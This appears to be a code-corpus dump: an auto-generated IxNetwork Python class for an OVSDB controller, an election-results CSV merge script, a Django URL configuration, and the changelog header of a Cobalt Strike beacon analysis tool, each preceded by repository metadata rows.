def PseudoMultiplier(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplier'])
@property
def PseudoMultiplierBfd(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierBfd'])
@property
def PseudoMultiplierVxlanReplicator(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierVxlanReplicator'])
@property
def Role(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[master | none | slave]): The role of the OVSDB Controller.
"""
return self._get_attribute(self._SDM_ATT_MAP['Role'])
@property
def ServerAddDeleteConnectionError(self):
# type: () -> str
"""
Returns
-------
- str: API to retrieve error occured while Adding/ Deleting Server
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'])
@ServerAddDeleteConnectionError.setter
def ServerAddDeleteConnectionError(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'], value)
@property
def ServerAddDeleteStatus(self):
# type: () -> str
"""
Returns
-------
- str: Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteStatus'])
@property
def ServerConnectionIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server which needs to be Added/Deleted.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ServerConnectionIp']))
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def TableNames(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TableNames']))
@property
def TimeOut(self):
# type: () -> int
"""
Returns
-------
- number: Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
"""
return self._get_attribute(self._SDM_ATT_MAP['TimeOut'])
@TimeOut.setter
def TimeOut(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['TimeOut'], value)
@property
def VerifyHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify HW Gateway Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyHWGatewayCertificate']))
@property
def VerifyPeerCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify Peer Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyPeerCertificate']))
@property
def Vxlan(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['Vxlan'])
@Vxlan.setter
def Vxlan(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Vxlan'], value)
@property
def VxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['VxlanReplicator'])
@VxlanReplicator.setter
def VxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['VxlanReplicator'], value)
def update(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Updates ovsdbcontroller resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Adds a new ovsdbcontroller resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with all currently retrieved ovsdbcontroller resources using find and the newly added ovsdbcontroller resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained ovsdbcontroller resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, EnableLogging=None, Errors=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, PseudoMultiplier=None, PseudoMultiplierBfd=None, PseudoMultiplierVxlanReplicator=None, Role=None, ServerAddDeleteConnectionError=None, ServerAddDeleteStatus=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
"""Finds and retrieves ovsdbcontroller resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ovsdbcontroller resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ovsdbcontroller resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoMultiplier (number): Multiplier for GUI-only connection
- PseudoMultiplierBfd (number): Multiplier for GUI-only connection
- PseudoMultiplierVxlanReplicator (number): Multiplier for GUI-only connection
- Role (list(str[master | none | slave])): The role of the OVSDB Controller.
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- ServerAddDeleteStatus (str): Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
- SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with matching ovsdbcontroller resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ovsdbcontroller data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ovsdbcontroller resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def AddServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the addServer operation on the server.
Add Server.
addServer(Arg2=list, async_operation=bool)list
----------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('addServer', payload=payload, response_object=None)
def ClearLastErrors(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearLastErrors operation on the server.
Clear Error Messages reported due to Last Action.
clearLastErrors(Arg2=list, async_operation=bool)list
----------------------------------------------------
- Arg2 (list(number)): List of indices for which to clear last reported error messages.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearLastErrors', payload=payload, response_object=None)
def ClearPortLogs(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearPortLogs operation on the server.
Add Server.
clearPortLogs(Arg2=list, async_operation=bool)list
--------------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearPortLogs', payload=payload, response_object=None)
def ControllerDumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the controllerDumpDB operation on the server.
Command to fetch Tor Information stored internally.
controllerDumpDB(Arg2=list, async_operation=bool)list
-----------------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('controllerDumpDB', payload=payload, response_object=None)
def DeleteServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the deleteServer operation on the server.
Delete Server.
deleteServer(Arg2=list, async_operation=bool)list
-------------------------------------------------
- Arg2 (list(number)): List of indices for which to Delete Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('deleteServer', payload=payload, response_object=None)
def DumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the dumpDB operation on the server.
Attach.
dumpDB(Arg2=list, async_operation=bool)list
-------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('dumpDB', payload=payload, response_object=None)
def GetServerAddDeleteStatus(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the getServerAddDeleteStatus operation on the server.
Get Server Status.
getServerAddDeleteStatus(Arg2=list, async_operation=bool)list
-------------------------------------------------------------
- Arg2 (list(number)): List of indices for which to get Server Status.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getServerAddDeleteStatus', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, ClearDumpDbFiles=None, ConnectionType=None, ControllerTcpPort=None, DirectoryName=None, DumpdbDirectoryName=None, EnableOvsdbServerIp=None, ErrorCode=None, ErrorDesc=None, ErrorLogDirectoryName=None, ErrorLogicalSwitchName=None, ErrorPhysicalSwitchName=None, ErrorTimeStamp=None, FileCaCertificate=None, FileCertificate=None, FileHWGatewayCertificate=None, FilePrivKey=None, HSCConfiguration=None, OvsdbSchema=None, OvsdbServerIp=None, ServerConnectionIp=None, TableNames=None, VerifyHWGatewayCertificate=None, VerifyPeerCertificate=None):
"""Base class infrastructure that gets a list of ovsdbcontroller device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- ClearDumpDbFiles (str): optional regex of clearDumpDbFiles
- ConnectionType (str): optional regex of connectionType
- ControllerTcpPort (str): optional regex of controllerTcpPort
- DirectoryName (str): optional regex of directoryName
- DumpdbDirectoryName (str): optional regex of dumpdbDirectoryName
- EnableOvsdbServerIp (str): optional regex of enableOvsdbServerIp
- ErrorCode (str): optional regex of errorCode
- ErrorDesc (str): optional regex of errorDesc
- ErrorLogDirectoryName (str): optional regex of errorLogDirectoryName
- ErrorLogicalSwitchName (str): optional regex of errorLogicalSwitchName
- ErrorPhysicalSwitchName (str): optional regex of errorPhysicalSwitchName
- ErrorTimeStamp (str): optional regex of errorTimeStamp
- FileCaCertificate (str): optional regex of fileCaCertificate
- FileCertificate (str): optional regex of fileCertificate
- FileHWGatewayCertificate (str): optional regex of fileHWGatewayCertificate
- FilePrivKey (str): optional regex of filePrivKey
- HSCConfiguration (str): optional regex of hSCConfiguration
- OvsdbSchema (str): optional regex of ovsdbSchema
- OvsdbServerIp (str): optional regex of ovsdbServerIp
- ServerConnectionIp (str): optional regex of serverConnectionIp
- TableNames (str): optional regex of tableNames
- VerifyHWGatewayCertificate (str): optional regex of verifyHWGatewayCertificate
- VerifyPeerCertificate (str): optional regex of verifyPeerCertificate
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
| [
"[email protected]"
] | |
b7bad42217740964a6c56c458b83e77dcb6f7ac0 | 22102fe3aadaabb967b9a0e33af5ea624afdaa38 | /merge.py | 6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d | [
"MIT"
] | permissive | tecoholic/Election2021 | 1c840a0e7ba23c885ca07ab9e676087fb312189f | 0b3fb8930d09883f5b58584f6f14b02d30788cbf | refs/heads/main | 2023-04-30T22:20:37.406868 | 2021-05-14T11:17:16 | 2021-05-14T11:17:16 | 363,843,846 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import os
import pandas as pd
states = {
"AS": 126,
"KL": 140,
"PY": 30,
"TN": 234,
"WB": 294
}
def get_code(party):
if party.lower() == "none of the above":
return "NOTA"
party = party.replace("of ", "") # handle CPIM
parts = party.split(" ")
parts = [p.strip() for p in parts]
return "".join(p[0] if not p.startswith("(") else p[0:2]+p[-1] for p in parts).upper()
def main():
for state in states:
print("Merging files of ", state)
base_dir = os.path.join("may2021", state)
df = None
for i in range(1, states[state] + 1):
filename = os.path.join(base_dir, f"{i}.csv")
try:
data = pd.read_csv(filename)
except FileNotFoundError:
print("Cannot find file: ", filename)
continue
data["AC_NO"] = i
data["Position"] = data["Total Votes"].rank(
ascending=False).astype('int')
data["Party Code"] = data["Party"].apply(get_code)
if df is None:
df = data
else:
df = df.append(data)
fname = os.path.join(base_dir, "all_candidate.csv")
df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
450884b464f60b3e241efe035f78dab576018545 | 56aa30f949f9e66bce9b7351d72cf76a65e8cd33 | /config/urls.py | 486d4479c5a6cb420fffdd8d1f3b3df2f07eba70 | [
"MIT"
] | permissive | bfssi-forest-dussault/food_list_db | 5684677aa9df6cd30fd81ae4a16940af34b32190 | 76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7 | refs/heads/master | 2022-12-11T22:38:49.250432 | 2020-09-10T20:17:10 | 2020-09-10T20:17:10 | 294,507,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,886 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
| [
"[email protected]"
] | |
c342af77f7076aebe55ba2cc939f06cccaabe9c9 | 137832600734c4a3a16966bbaba19d3540378f9a | /1768.py | d44ef2d1bd2a0adbdd61901b7614ced2cfa29e10 | [] | no_license | DidierStevens/DidierStevensSuite | e824354c80f5b7aae4dfb6e55f60178eb9ae208c | 8190354314d6f42c9ddc477a795029dc446176c5 | refs/heads/master | 2023-09-01T20:11:55.341694 | 2023-08-29T10:26:39 | 2023-08-29T10:26:39 | 35,275,445 | 1,670 | 554 | null | 2023-06-04T22:54:40 | 2015-05-08T11:21:00 | Python | UTF-8 | Python | false | false | 112,042 | py | #!/usr/bin/env python
from __future__ import print_function
__description__ = 'Analyze Cobalt Strike beacons'
__author__ = 'Didier Stevens'
__version__ = '0.0.19'
__date__ = '2023/04/27'
"""
Source code put in the public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2019/05/15: start
2019/05/18: continue
2019/05/25: continue
2019/12/06: continue
2019/12/07: continue
2019/12/17: continue
2020/02/03: 0.0.2 some changes for CS4: xor key is '.' in stead of 'i'
2020/10/11: 0.0.3 Python 3 fixes
2020/10/17: improve parsing
2020/10/18: updated some config identifiers: found https://github.com/JPCERTCC/aa-tools https://github.com/sysopfb/malware_decoders/tree/master/cs_beacon https://github.com/Sentinel-One/CobaltStrikeParser
2020/10/21: Python 3 fix in cBinaryFile
2020/10/28: refactoring
2020/10/29: man
2020/11/04: added xor chain decoding
2020/11/07: 0.0.4 updated shellcode analysis
2020/11/12: updated shellcode analysis
2020/11/16: added option -l
2020/11/17: continue
2020/11/29: added rule_shellcode_00_end
2021/02/13: 0.0.5 updated shellcode analysis (+ Python 3 fix); added XORChain analysis for PE sections; remove duplicate configs when dumping raw
2021/03/06: added option -c
2021/03/25: 0.0.6 fix for provided sample
2021/04/06: fix
2021/04/28: added option -J
2021/04/30: CS version guessing
2021/05/02: fix
2021/05/15: continue JSON output
2021/06/14: updated man with 1768.json info
2021/10/10: 0.0.8 1768.json improvements
2021/10/17: 0.0.9 added malleable instructions decoding
2021/11/01: refactoring instructions decoding
2021/11/05: 0.0.10 cOutput replacements
2021/11/07: added FinalTests
2021/11/14: added DNS fields
2021/11/17: added missing field names (ebook FINDING BEACONS IN THE DARK)
2021/12/12: 0.0.11 added 1768b.json support
